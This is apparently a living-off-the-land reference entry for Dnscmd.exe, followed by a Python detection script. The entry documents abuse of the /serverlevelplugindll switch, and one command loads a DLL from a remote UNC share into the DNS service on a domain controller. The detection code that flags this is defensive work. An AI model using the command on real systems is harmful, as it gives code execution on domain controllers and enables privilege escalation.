~/ cat Dnscmd.exe.md

A command-line interface for managing DNS servers.

Paths:

C:\Windows\System32\Dnscmd.exe
C:\Windows\SysWOW64\Dnscmd.exe

Detection: Dnscmd.exe loading a DLL from a UNC path

Execute

Adds a specially crafted DLL as a plug-in of the DNS Service. This command must be run on a DC by a user who is at least a member of the DnsAdmins group. See the reference links for DLL details.

dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll
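
The detection noted above, as an added example that is not part of the original page: a Python check over process-creation command lines that flags `dnscmd` invocations using `/config /serverlevelplugindll` and extracts the UNC host the DLL would be loaded from. The sample lines other than the page's own command are constructed, and the `high`/`medium` severity labels and function names are assumptions of this example.

```python
import re
import shlex

# dnscmd or dnscmd.exe, with or without a directory prefix.
IMAGE_RE = re.compile(r'(?:^|[\\/])dnscmd(?:\.exe)?$', re.IGNORECASE)
# UNC forms: \\host\share\..., \\?\UNC\host\share\..., //host/share/...
UNC_RE = re.compile(r'^(?:\\\\\?\\UNC\\|\\\\|//)([^\\/?]+)[\\/]', re.IGNORECASE)

def split_cmdline(cmdline):
    # posix=False keeps Windows backslashes intact; quotes are stripped here.
    return [t.strip('"') for t in shlex.split(cmdline, posix=False)]

def check_dnscmd(cmdline):
    """Return a finding dict for a server-level plug-in DLL change, else None."""
    try:
        tokens = split_cmdline(cmdline)
    except ValueError:  # unbalanced quotes: fall back to whitespace split
        tokens = cmdline.split()
    if not tokens or not IMAGE_RE.search(tokens[0]):
        return None
    lowered = [t.lower() for t in tokens]  # switches are matched case-insensitively
    if '/config' not in lowered or '/serverlevelplugindll' not in lowered:
        return None
    idx = lowered.index('/serverlevelplugindll')
    dll = tokens[idx + 1] if idx + 1 < len(tokens) else ''
    m = UNC_RE.match(dll)
    return {
        'dll': dll,
        'unc_host': m.group(1) if m else None,
        # Assumed labels: remote (UNC) load is 'high', any other change 'medium'.
        'severity': 'high' if m else 'medium',
    }

# Sample command lines as they would appear in process-creation logs.
# The first is the command from the page; the rest are constructed.
SAMPLES = [
    r'dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll',
    r'"C:\Windows\System32\Dnscmd.exe" /Config /ServerLevelPluginDll "\\?\UNC\fs01\share\p.dll"',
    r'dnscmd dc1.lab.int /config /serverlevelplugindll C:\Windows\Temp\p.dll',
    r'dnscmd.exe dc1.lab.int /enumzones',
]

if __name__ == '__main__':
    for line in SAMPLES:
        print(check_dnscmd(line), '<-', line)
```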